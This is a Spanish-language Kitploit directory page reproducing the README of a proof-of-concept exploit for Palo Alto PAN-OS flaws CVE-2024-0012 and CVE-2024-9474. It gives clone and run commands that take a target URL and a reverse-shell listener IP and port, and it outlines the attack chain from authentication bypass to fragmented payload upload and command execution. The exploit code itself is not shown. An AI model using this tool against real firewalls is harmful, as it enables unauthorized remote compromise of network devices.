Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-0012_CVE-2024-9474_PoC — Este PoC está dirigido a vulnerabilidades en Palo Alto PAN-OS, específicamente CVE-2024-0012 y CVE-2024-9474. Este script automatiza el proceso de explotación, incluyendo la creación de payloads, la entrega fragmentada y la ejecución fluida de comandos. | Kitploit
Herramientas/GitHubGitHub/talatumlabs/cve-2024-0012_cve-2024-9474_poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubtalatumlabs/cve-2024-0012_cve-2024-9474_poc

CVE-2024-0012_CVE-2024-9474_PoC

Este PoC está dirigido a vulnerabilidades en Palo Alto PAN-OS, específicamente CVE-2024-0012 y CVE-2024-9474. Este script automatiza el proceso de explotación, incluyendo la creación de payloads, la entrega fragmentada y la ejecución fluida de comandos.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
85hace 1 añoAún no revisado

🚀 Exploit CVE-2024-0012 y CVE-2024-9474 (Palo Alto PAN-OS) 🔐

Palo Alto PAN-OS Exploit Type

🛡️ Descripción

Este script de Prueba de Concepto (PoC) se dirige a vulnerabilidades en Palo Alto PAN-OS, específicamente CVE-2024-0012 y CVE-2024-9474, automatizando el proceso de explotación, incluyendo el bypass de autenticación, la creación del payload, la entrega fragmentada y la ejecución de comandos sin interrupciones.

⚠️ Este script es solo para fines educativos y pruebas de penetración autorizadas. El uso no autorizado es ilegal.


🔍 Vulnerabilidades Abordadas

CVE-2024-0012

  • Tipo: Bypass de autenticación
  • Impacto: Permite el acceso no autorizado a las interfaces administrativas.
  • Gravedad: 🚨 Crítica

CVE-2024-9474

  • Tipo: Ejecución de comandos y escalada de privilegios
  • Impacto: Permite a atacantes remotos ejecutar comandos arbitrarios.
  • Gravedad: 🔥 Media

🧑‍💻 Uso

🛠️ Clonar el repositorio

root@kitploit:~
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC

🚀 Ejecutar el script

root@kitploit:~
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

Argumentos:

  • <TARGET_URL>: La URL de destino, incluyendo http o https.
  • <LISTENER_IP>: Tu dirección IP para el listener del reverse shell.
  • <LISTENER_PORT>: El puerto para el listener del reverse shell.

💡 Ejemplo

root@kitploit:~
python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444

💻 Demostración del exploit

https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5


⚙️ Cómo funciona

¡Obtén el desglose completo y los detalles técnicos de este PoC en este artículo de Medium!

  1. 🔍 Comprueba la vulnerabilidad: Garantiza que el objetivo es vulnerable a CVE-2024-0012 y CVE-2024-9474.
  2. 🛡️ Extrae PHPSESSID: Obtiene un ID de sesión para continuar con la explotación.
  3. ✨ Genera el payload: Crea un payload de reverse shell con doble codificación.
  4. 📦 Sube fragmentos: Envía fragmentos del payload al servidor de destino.
  5. 🔗 Combina el payload: Reconstruye el payload en el sistema de destino.
  6. ⚡ Ejecuta el comando: Decodifica y ejecuta el reverse shell.

⚠️ Aviso legal

Este PoC está destinado únicamente a fines educativos y pruebas de seguridad autorizadas. El uso no autorizado de esta herramienta está estrictamente prohibido. Los autores no son responsables de cualquier mal uso o daño causado por esta herramienta.


🧑‍🎓 Autor

ghostxploiter

Descargar herramienta